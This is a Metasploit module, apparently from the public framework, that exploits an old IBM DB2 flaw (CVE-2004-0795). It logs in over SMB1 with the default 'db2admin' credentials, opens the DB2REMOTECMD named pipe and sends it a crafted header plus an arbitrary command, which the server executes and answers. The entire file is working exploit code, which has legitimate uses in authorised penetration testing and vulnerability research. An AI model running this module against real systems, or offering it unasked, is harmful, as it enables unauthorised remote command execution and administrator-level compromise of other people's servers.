##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
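class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client

  # Module metadata and options.
  #
  # CMD is written verbatim to the DB2REMOTECMD pipe and executed by the target.
  # SMBUser/SMBPass default to 'db2admin'/'db2admin' (with USERNAME/PASSWORD as
  # datastore fallbacks). SMB::ProtocolVersion is deregistered because run()
  # pins the connection to SMB1, so the dialect cannot be overridden.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in the Remote Command Server
          component in IBM's DB2 Universal Database 8.1. An authenticated
          attacker can send arbitrary commands to the DB2REMOTECMD named pipe
          which could lead to administrator privileges.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-0795' ],
          [ 'OSVDB', '4180' ],
          [ 'BID', '9821' ],
        ],
        'DisclosureDate' => '2004-03-04',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('CMD', [ true, 'The command to execute', 'ver']),
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin'], fallbacks: ['USERNAME']),
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'], fallbacks: ['PASSWORD']),
      ]
    )

    deregister_options('SMB::ProtocolVersion')
  end

  # Authenticate over SMB1, open the DB2REMOTECMD named pipe and hand it CMD.
  #
  # Login and pipe-creation failures are reported with print_error and end the
  # run. Whatever happens after the socket is open, the pipe (if created) and
  # the socket are released by the ensure clause, so an exception raised by the
  # request/response exchange no longer leaks the connection. The response read
  # from the pipe is printed as-is.
  def run
    print_status('Connecting to the server...')
    # SMB1 only; SMB::ProtocolVersion was deregistered in initialize.
    connect(versions: [1])

    pipe = nil
    begin
      # NOTE: this echoes the password into the console/log output.
      print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

      # Bail out on bad credentials; ensure below still disconnects.
      begin
        smb_login
      rescue StandardError => e
        print_error("Error: #{e}")
        return
      end

      rcmd = datastore['CMD']

      print_status('Connecting to named pipe \\DB2REMOTECMD...')

      # Bail out if the pipe cannot be opened (e.g. service absent).
      begin
        pipe = simple.create_pipe('\\DB2REMOTECMD')
      rescue StandardError => e
        print_error("Error: #{e}")
        return
      end

      # Trans2 QUERY_FILE_INFO (0x0007) against the pipe's FID with info
      # level 1005, sent before the command as the original exchange does.
      simple.client.trans2(0x0007, [pipe.file_id, 1005].pack('vv'), '')

      # Fixed-size header (carrying the command's byte length), then the command.
      pipe.write(rcmd_header(rcmd))
      pipe.write(rcmd)

      # Print whatever the server sends back, verbatim.
      print_line(pipe.read)
    ensure
      close_pipe(pipe)
      disconnect
    end
  end

  private

  # Build the fixed-size request header written to the pipe before the command.
  #
  # Layout: 4-byte LE value 1, the literal 'DB2', 525 NUL bytes of padding,
  # then the command length as a 4-byte LE integer. The length is the
  # command's byte length (bytesize), because that is exactly what is written
  # to the pipe next; String#length would undercount a command containing
  # multibyte characters and desynchronise the server's read.
  def rcmd_header(rcmd)
    [0x00000001].pack('V') + 'DB2' + ("\x00" * 525) + [rcmd.bytesize].pack('V')
  end

  # Best-effort close of the named pipe. A failure here (for instance after the
  # connection has already dropped) must not mask an exception that is
  # propagating out of run, so it is only reported in verbose mode.
  def close_pipe(pipe)
    return unless pipe

    pipe.close
  rescue StandardError => e
    vprint_error("Failed to close pipe: #{e}")
  end
end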